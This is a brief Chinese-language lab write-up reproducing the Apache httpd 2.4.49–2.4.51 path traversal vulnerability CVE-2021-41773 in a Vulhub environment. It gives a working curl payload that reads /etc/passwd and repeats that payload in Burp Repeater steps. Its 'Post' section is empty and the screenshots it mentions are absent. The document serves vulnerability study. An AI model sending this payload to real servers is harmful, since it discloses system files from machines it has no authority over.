目錄
漏洞描述
漏洞復現具體步驟:
用burp復現:
Get:
Post:
漏洞描述
目錄穿越比目錄瀏覽、目錄遍歷更具破壞性,目錄穿越不僅可以讀取服務器中任何目錄及任何檔案的內容,還可以執行系統命令,
漏洞等級:高危
影響版本:
Apache httpd 2.4.49-2.4.51
準備階段:
環境:win7虛擬機(裝有BP) kali(裝有最新的docker vulhub)
漏洞復現具體步驟:
1.進入Vulhub目錄中啟動存在漏洞的Apache 服務器
/home/kali/vulhub/httpd/CVE-2021-41773/
2.win7訪問Apache 默認的It works!頁面
3.漏洞利用
使用如下CURL命令來發送Payload---/icons/必須是一個存在且可以訪問的目錄
curl -v --path-as-is http://192.168.132.10:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
可以看到已經把當前系統里的/etc/passwd里的內容已經掃出來了
用burp復現:
Get:
http://192.168.132.10:8080/icons/ 將此url 在repeater里面右鍵改為request請求
點擊send出現下圖
將.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 拼接在后面
Post:
Id:
Pwd:
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/312046.html
標籤:其他
上一篇:SSRF漏洞實體分析